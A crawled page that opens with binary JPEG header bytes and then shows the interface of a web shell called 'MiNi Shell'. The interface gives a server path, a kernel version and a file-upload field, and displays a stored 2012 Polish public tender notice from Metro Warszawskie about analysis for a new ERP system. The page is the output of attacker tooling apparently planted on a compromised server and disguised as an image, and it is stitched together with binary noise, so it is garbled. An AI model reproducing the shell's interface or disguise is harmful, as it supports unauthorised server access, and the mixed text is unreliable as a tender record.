JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120626/219646-N-2012.html

<p class="kh_header"><b>Warszawa: wykonanie analizy wdrożeniowej oraz specyfikacji na nowy system ERP,</b><br>
<b>Numer ogłoszenia: 219646 - 2012; data zamieszczenia: 26.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Metro Warszawskie Sp. z o.o. , ul. Wilczy Dół 5, 02-798 Warszawa, woj. mazowieckie, tel. 022 6554670, faks 022 6433997, 6554679.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.metro.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie analizy wdrożeniowej oraz specyfikacji na nowy system ERP,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot Zamówienia, w podziale na 2 Etapy, obejmuje:

Etap I:
a) wykonanie analizy procesów biznesowych (stan obecny) rozumianych jako opis działań lub zadań w logicznym ciągu zdarzeń, które rozwiązują określony problem lub prowadzą do osiągnięcia określonego efektu. Poziom szczegółowości: czynność elementarna, stanowisko pracy, dokument. Analiza uwzględniać winna następujące moduły: 
- Finanse, Księgowość,
- Obsługa Sprzedaży,
- Środki Trwałe,
- Gospodarka Materiałowa,
- Gospodarka Remontowa. 
b) wykonanie analizy procesów i wygenerowanie propozycji zmian w procesach (identyfikacja celów biznesowych: stan docelowy) 
c) opracowanie planu wdrożenia, obejmującego: 
- cele wdrożenia,
- oszacowanie wszystkich kosztów związanych z informatyzacją na przestrzeni od 3 do 5 lat,
- opracowanie ramowego harmonogramu wdrożeń z podziałem na etapy. 
d) pomoc w powołaniu zespołów roboczych i zdefiniowania zakresów ich odpowiedzialności ze strony Wykonawców jak i Zamawiającego,
e) przeprowadzenie warsztatów i wywiadów indywidualne lub w grupach roboczych w komórkach organizacyjnych w których planowane systemy będą wykorzystywane,
f) bezpośrednie konsultacje określające specyficzne wymagania przyszłych użytkowników systemów i analiza tych wymagań w celu określenia priorytetów wdrożeniowych, 
g) opracowanie Specyfikacji Wymagań Funkcjonalnych i Technicznych dla systemu ERP wynikających z organizacji Metra Warszawskiego Sp. z o.o. Strukturę wymagań należy przedstawić w postaci tabel funkcjonalnych.
h) opracowanie dokumentacji istotnych warunków zamówienia (SIWZ) w zakresie opisu przedmiotu zamówienia i proponowanych kryteriów wyboru ofert, kompletnej propozycji treści wzoru umowy na zakup, wdrożenie i obsługę planowanych systemów informatycznych.

Etap II:
Udział (doradztwo) w postępowaniu lub postępowaniach przetargowych na wybór dostawcy systemu ERP w  Metrze Warszawskim Sp. z o.o.,  w tym:
a) współpraca przy udzielaniu odpowiedzi i wyjaśnień na pytania składane w trakcie procedur przetargowych, które będą realizowane na podstawie dokumentacji opracowanej przez Wykonawcę,
b) udział w ocenie ofert złożonych w postępowaniu lub  postępowaniach przetargowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przed złożeniem oferty wniesie wadium na okres związania ofertą w wysokości: 3 000,- zł (słownie złotych: trzy tysiące 00/100).
Za skutecznie wniesione wadium w pieniądzu, Zamawiający uzna wadium, które w terminie przewidzianym na składanie ofert znajdzie się na koncie Metra Warszawskiego Sp. z o.o. Bank Pekao S.A. nr 61 1240 6003 1111 0000 4947 4518
Wadium może też być wnoszone w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt. 2 ustawy 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 z późn. zm.) składanych w oryginale przed złożeniem oferty, w siedzibie Metra Warszawskiego Sp. z o.o., bud. 3A w pok. 218 w Dziale Finansowym w godz. 10.00 - 15.00 
W przypadku składania wadium w formie gwarancji powinna ona być co najmniej gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze żądanie oraz powinna zostać sporządzona zgodnie z obowiązującym prawem, w tym zgodnie z przepisami ustawy Pzp.
Zamawiający zwraca, zatrzymuje oraz żąda ponownego wniesienia wadium na zasadach określonych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada niezbędne doświadczenie w wykonywaniu usług doradczych związanych z Przedmiotem Zamówienia tj. wykazać, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał przynajmniej dwie usługi odpowiadające  Przedmiotowi Zamówienia, tj. polegające na  wykonaniu usługi kompleksowej analizy procesów biznesowych w celu zdefiniowania optymalnego systemu zarządzania klasy ERP dla minimum 4 firm, w tym:
- minimum 2 firm związanych z obsługą miejskiej, zbiorowej  komunikacji publicznej lub obsługą komunikacji  kolejowej,
- minimum 2 firm budowlanych.
 W/w firmy  winny charakteryzować się następującym zatrudnieniem:
- przynajmniej 1 firma z zatrudnieniem nie mniejszym niż 1000 osób w chwili zakończenia usługi, 
- przynajmniej 1 firma z zatrudnieniem nie mniejszym niż 500 osób w chwili zakończenia usługi.
Złożenie przez wykonawców w ofercie dokumentów i oświadczeń, wymienionych w pkt 6 SIWZ będzie stanowiło podstawę do oceny spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw do wykluczenia z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że  dysponuje następującymi osobami zdolnymi do wykonania zamówienia, które będą brały udział w realizacji Przedmiotu Zamówienia:
1)	Kierownik projektu - 1 osoba spełniająca następujące wymogi:
- znajomość metodyki zarządzania projektami, potwierdzoną aktualnym zaświadczeniem PRINCE2 lub równoważnym,
- przynajmniej 5 letnie doświadczenie w kierowaniu, nadzorze i zarządzaniu projektami informatycznymi dotyczącymi wykonywania analiz procesowych i usprawniania procesów oraz analiz funkcjonalnych systemów informatycznych klasy ERP, w przynajmniej dwóch firmach: 1 firma z zatrudnieniem powyżej 1000 osób i 1 firma z zatrudnieniem powyżej 500 osób.
2)	Konsultant biznesowy - 1 osoba spełniająca następujące wymogi:
- znajomość metodyki zarządzania projektami, potwierdzona aktualnym zaświadczeniem PRINCE2 lub równoważnym,
- minimum 5 letnie doświadczenie związane z realizacją projektów informatycznych dotyczących wykonywania analiz procesowych i usprawniania procesów oraz analiz funkcjonalnych systemów informatycznych klasy ERP, w firmach transportowych i budowlanych.
3)	Konsultant - minimum 3 osoby, każda  spełniająca następujące wymogi:
- przynajmniej 3 letnie doświadczenie w realizacji analiz procesowych i usprawniania procesów oraz analizy funkcjonalnej systemów informatycznych klasy ERP. 

Wykonawca złoży wraz z ofertą oświadczenie, że  wykazane osoby będą wykonywały Przedmiot Zamówienia.  Zmiana osób biorących udział w realizacji Przedmiotu Zamówienia będzie możliwa wyłącznie w porozumieniu i za pisemną zgodą Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity Dz.U. z 2010r. nr 113 poz. 759), Zamawiający dopuszcza możliwość istotnych zmian postanowień zawartej Umowy w stosunku do treści Oferty - w następującym zakresie i w przypadku zaistnienia następujących okoliczności: 
1)	 zmiana terminów określonych w Umowie w przypadku wystąpienia następujących okoliczności:
a)	zmiany  zakresu prac wprowadzonej  zgodnie z Umową;
b)	zmian przepisów prawa, mających wpływ na termin wykonania prac lub sposób prowadzenia prac;
c)	opóźnień w rozpoczęciu lub wykonywaniu  Przedmiotu Zamówienia  powstałych z przyczyn nie leżących po stronie Wykonawcy, których nie można było przewidzieć w chwili zawarcia Umowy, przy  zachowania należytej staranności ;
d)	opóźnień w realizacji Przedmiotu Zamówienia wynikłych z winy Zamawiającego, za które Wykonawca Przedmiotu Zamówienia nie ponosi odpowiedzialności,
e)	skrócenia terminów wykonania Przedmiotu Zamówienia lub jej części; 
2)	zmiana Ceny Umownej w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT); 
3)	zmiana Umowy w związku z oznaczeniem danych dotyczących Zamawiającego lub Wykonawcy; 
4)	zmiana Umowy w związku z wystąpieniem Siły Wyższej; 
5)	zmiana Umowy w związku ze stwierdzeniem Wad nie nadających się do usunięcia, 
6)	zmiana Umowy w związku z wydłużeniem okresu gwarancji jakości lub rękojmi;
7)	zmiana Umowy w wyniku zmiany formy lub terminu obowiązywania zabezpieczenia należytego wykonania Umowy; 
8)	zmiana Umowy wynikająca z orzeczeń sądów powszechnych, decyzji administracyjnych i orzeczeń sądów administracyjnych;
9)	zmiana Umowy w związku ze zmianą regulacji prawnych wprowadzonych w życie po dacie zawarcia Umowy, wraz ze skutkami takiej zmiany regulacji prawnych.

Warunkiem wprowadzenia zmian zawartej Umowy jest sporządzenie podpisanego przez Strony Protokołu konieczności określającego przyczyny zmiany oraz potwierdzającego wystąpienie (odpowiednio) co najmniej jednej z okoliczności wymienionych w pkt 18.5 SIWZ. Protokół konieczności będzie załącznikiem do aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.metro.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Metro Warszawskie Sp. z o.o. (M.W.), ul. Wilczy Dół 5; 02-798 Warszaw, budynek 3c, pokój 102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2012 godzina 12:00, miejsce: Warszawa przy ulicy Wilczy Dół 5,  Kancelaria w Budynku Portierni Głównej Metra Warszawskiego Sp. z o.o..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com